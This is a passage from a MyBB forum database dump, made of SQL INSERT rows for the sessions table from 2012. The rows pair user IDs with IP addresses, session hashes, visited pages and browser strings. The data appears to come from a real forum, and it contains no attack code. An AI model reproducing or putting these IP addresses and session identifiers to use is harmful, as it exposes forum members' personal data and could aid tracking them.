'180', '77.86.33.102', '1347123679', '/showthread.php?tid=275', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari', '0', '0', '12', '275'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0bc229e7f57d992549652dda25f724f3', '182', '195.91.108.175', '1348909682', '/showthread.php?tid=508', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari', '0', '0', '13', '508'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('28a46f805d68e67f678a70dc7205484f', '127', '83.109.119.246', '1348071820', '/forumdisplay.php?fid=15', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari', '0', '0', '15', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('208ec58275d2f3fb3538b0b424e40d0e', '183', '69.119.94.188', '1347362808', '/showthread.php?tid=228', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari', '0', '0', '12', '228'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('48b5f781bbd0f51817f3fffc4ef63654', '193', '117.216.90.113', '1347894850', '/private.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.12 (KHTML, like Gecko) Maxthon/3.4.3.1200 Chrome', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7cd99da40748253e40125f0a3138a809', '187', '75.34.59.228', '1347655471', '/misc.php?action=dstswitch&amp;ajax=1', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('269fa53215226a791355d062dc46c9fc', '188', '68.83.86.251', '1347928962', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('51601fa00cac930a1c6c9931aa76fb69', '55', '98.176.49.100', '1347749623', '/search.php?action=results&amp;sid=ee1880aa38e9767ea6756945a0f230ba', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0e763a5e995dc8f6e4a407fa7043fc7d', '289', '78.70.49.201', '1351093757', '/showthread.php?tid=800', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '15', '800'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f5d8ff57cdd77e24d61387a018fe87a4', '189', '95.19.100.107', '1347742516', '/index.php?', 'Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8941eb976e3c541f3b1649d3f4ae5b75', '20', '24.59.243.229', '1350505107', '/newthread.php?fid=63', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6c9e598222061ca582ac8d8209bb3391', '184', '99.164.138.156', '1347821473', '/forumdisplay.php?fid=12', 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:15.0) Gecko/20100101 Firefox/15.0.1', '0', '0', '12', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f9f99ba2747721bac0d328224a149422', '112', '2.100.220.219', '1350390938', '/index.php?', 'Opera/9.80 (Windows NT 6.1; Win64; x64; U; en) Presto/2.10.289 Version/12.02', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9771a905805e16b530bf8b5c39f8ae9f', '194', '99.42.159.191', '1351817794', '/upgrade.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1547fefd7ab7dc4729a764e982d78a38', '48', '195.158.72.91', '1351967295', '/forumdisplay.php?fid=15', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.122', '0', '0', '15', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1b599ec292c33a2d891d033254e1d436', '198', '68.204.185.63', '1348541163', '/index.php?', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.118', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('81a71f4118a7e0e9c26cfb22362d0b20', '197', '84.31.88.238', '1348522469', '/showthread.php?tid=49', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari', '0', '0', '21', '49'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6b614e676929010da6df6822af90aaa2', '202', '180.247.247.206', '1348812320', '/forumdisplay.php?fid=13', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4', '0', '0', '13', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('851affac10429d0611f5781babbf8ccc', '172', '88.193.83.195', '1352143918', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3802a5234127ab6e5cb4cce52342ce35', '219', '94.0.65.178', '1349465993', '/search.php?action=results&amp;sid=8ca598098991264e8b00e0dd6cde72f9', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ed6ce332bb97d4d37cb504a4b2f46094', '201', '199.58.84.3', '1348805352', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9395a328baebfabed6e254f9d51f39af', '201', '46.246.31.97', '1348880165', '/showthread.php?tid=532', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', '0', '0', '23', '532'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9c431008c92479015ce159b9182bc10d', '204', '122.52.119.1', '1348892480', '/showthread.php?tid=49', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4', '0', '0', '21', '49'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1d58761a7648c52175730bf7e5e1b33a', '0', '37.77.82.36', '1352804657', '/memberlist.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '1', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3c939de0948d0591a351fef07793851f', '207', '76.28.177.62', '1350164261', '/search.php?action=results&amp;sid=2909d42fabd44f2796c2c0c2b63a92ca', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8009b5d5fb6fb8e1c214d2265d43f74e', '208', '182.178.29.232', '1349012951', '/showthread.php?tid=113', 'Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '15', '113'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('55bc8194248dd3fc9126e41e2e6b546b', '210', '173.76.159.245', '1350035464', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a64531f5805c05cc4b17b7e1ba9301ca', '211', '174.127.99.162', '1349056766', '/showthread.php?tid=508', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari', '0', '0', '13', '508'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('69c153660bf7661a8fabaad185be7732', '212', '176.92.96.130', '1349092204', '/newreply.php?ajax=1&amp;action=do_newreply&amp;tid=543', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('07ff02d9cfed0b0a4e7909948165cfdd', '223', '174.127.99.156', '1350163790', '/showthread.php?tid=726', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '13', '726'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1053abfe0e3cba4454b84a4ecfdd43ba', '215', '121.7.73.219', '1349341043', '/showthread.php?tid=137', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4', '0', '0', '13', '137'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0633a4a0d7c084a507a2c2296b671c32', '216', '197.226.120.114', '1349365459', '/showthread.php?tid=173', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.91 Safari/537.4', '0', '0', '14', '173'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1fa1d9bb33a45052d07f4eb5e0a4a7ba', '217', '75.114.206.243', '1349386955', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('71d5b56fdfb3112eaa064c03a3294849', '220', '112.204.57.97', '1349440518', '/showthread.php?tid=609', 'Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0.1', '0', '0', '58', '609'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e807982ada029689c318097991ea3032', '231', '99.233.52.247', '1349729595', '/showthread.php?tid=762', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari', '0', '0', '58', '762'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('940bb494395ac071d021ffaa557a01e4', '213', '178.250.34.208', '1350400184', '/search.php?action=results&amp;sid=bd916566b71cdb069c257c05797e1f24', 'Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e3fb24922ddb1f2045b8522dfc3ed2f3', '237', '203.92.138.166', '1351348944', '/forumdisplay.php?fid=21', 'Opera/9.80 (J2ME/MIDP; Opera Mini/7.0.28870/28.2794; U; en) Presto/2.8.119 Version/11.10', '0', '0', '21', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a3e93b9ca93b0d7de8e38dfc312a5f39', '240', '86.135.56.214', '1349800873', '/showthread.php?tid=713', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari', '0', '0', '12', '713'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0fbcf78aad5be9441bea8dce4bb24b44', '225', '75.162.63.152', '1349745368', '/showthread.php?tid=696', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', '0', '0', '13', '696'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ddbc3ed74db57c6bef8b90acb82e9ec0', '250', '24.61.32.100', '1350433718', '/index.php?', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.122', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8668e4f60439b8542bbadfae42e8a53a', '238', '108.221.21.146', '1349707765', '/showthread.php?tid=132', 'Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari', '0', '0', '20', '132'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f6a1a05b3e83cafa624c7c75e78f5cb8', '241', '108.18.121.45', '1350934535', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b02fa5e629090317d4db2da01906251e', '261', '84.85.88.250', '1350225214', '/showthread.php?tid=591', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '21', '591'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7c8c211f55ddb2987fab4f868e33c784', '252', '180.251.249.167', '1350065894', '/showthread.php?tid=563', 'Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0.1', '0', '0', '25', '563'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0789daba3dcda8a7d7e3a4520d06f500', '240', '86.173.50.88', '1350179489', '/showthread.php?tid=804', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version', '0', '0', '42', '804'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7faea9c77a6174aac92ee9372e718ef8', '256', '76.105.69.111', '1350137823', '/showthread.php?tid=50', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '12', '50'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5edca3867589f5fa08ebc8c7883735ba', '203', '67.68.73.22', '1350088783', '/index.php?', 'Mozilla/5.0 (iPod; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6', '0', '1', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('dc434333ce48e87238d2f72cc13d2457', '253', '173.76.159.245', '1350439381', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('49e22e1589c5d37a495714eaeeab3633', '267', '110.143.162.220', '1350456684', '/showthread.php?tid=616', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4', '0', '0', '67', '616'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2518c7a7cc8e0447eb97d0e3326e93bc', '264', '90.185.118.218', '1350590147', '/search.php?action=getdaily', 'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobi', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('dd6c1f97aa95a7e50f7af406e8542daa', '128', '213.49.101.145', '1350160938', '/showthread.php?tid=764', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '15', '764'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('64e5238e2f8746d7dc457db334dcdf0f', '293', '41.250.224.98', '1351971786', '/index.php?', 'Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X; nl-nl) AppleWebKit/534.46.0 (KHTML, like Gecko) CriOS', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a9c69e01a023803d959b365f2026489d', '288', '216.104.36.237', '1351052169', '/misc.php?action=username_history&amp;uhuid=222', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5e73b06029c564b0d5a73f1c9c76b432', '265', '78.143.155.3', '1351792594', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e5b387e9f3ee8d27e53d9211a0a191e4', '314', '129.121.101.56', '1352006222', '/usercp.php?action=editsig', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c67caadda46ad08557b58f50a703b365', '268', '206.82.167.137', '1351515920', '/showthread.php?tid=1100', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '42', '1100'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('24a62fcd3506e908924a570f71fe20df', '279', '122.162.83.200', '1350638154', '/showthread.php?tid=51&amp;page=2', 'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0', '0', '0', '11', '51'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c92359bdd6201d6bd0de1feaab293e74', '275', '92.40.175.24', '1350550976', '/forumdisplay.php?fid=42&amp;page=2', 'Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mo', '0', '0', '42', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ea6de0af48c76378d9a01eb6d1b62939', '270', '2.124.223.31', '1350912932', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3a8b02e919ba74aa3ebd456968285402', '276', '66.162.121.76', '1350577249', '/forumdisplay.php?fid=27', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '27', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('89a553951c7bcb90a5b639001afb0ced', '286', '189.231.170.101', '1350943601', '/showthread.php?tid=100', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '18', '100'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('45802093d51ddfc5456ff03906402186', '278', '82.157.58.115', '1350615025', '/showthread.php?tid=981', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari', '0', '0', '4', '981'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ba6a50adb023b8f0f3eb7b0c4bad9005', '3', '75.22.48.43', '1351314831', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('42466474e09358de24dec4b8c97e12cc', '246', '192.200.145.194', '1351466025', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('492a73687aaaccc9ede18ea5c62caac0', '280', '78.105.190.251', '1350686343', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e309c19b6acb8c8001795c4d365faead', '284', '31.172.30.3', '1350919398', '/upgrade.php?', 'Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1dcac2f01f8f0522cb573e9dd02e7bfa', '264', '87.55.196.22', '1350755519', '/reputation.php?uid=228', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c9578a1b0b6a6c203682dc6b1c53cc7c', '282', '208.94.131.5', '1350674090', '/forumdisplay.php?fid=16&amp;page=3', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4', '0', '0', '16', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('52b9d58db5e51860c54546a25c64353f', '259', '101.163.15.100', '1351509401', '/showthread.php?tid=312', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4', '0', '0', '15', '312'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5e14049d2b2e913c6c07ab31844b22a7', '283', '122.149.177.181', '1350732865', '/showthread.php?tid=922', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '1', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e0421f96f81098ddc1d869a087fdc1fd', '285', '71.239.97.104', '1351030889', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e50fee1916eb59ed97138be181b5a49f', '214', '71.72.242.232', '1351375580', '/showthread.php?tid=938', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version', '0', '1', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f0c717c271ce087767ec160bfbd98f3a', '296', '91.148.160.213', '1351343062', '/showthread.php?tid=49', 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '21', '49'); INSERT INTO `mybb_sessions` (`sid`, 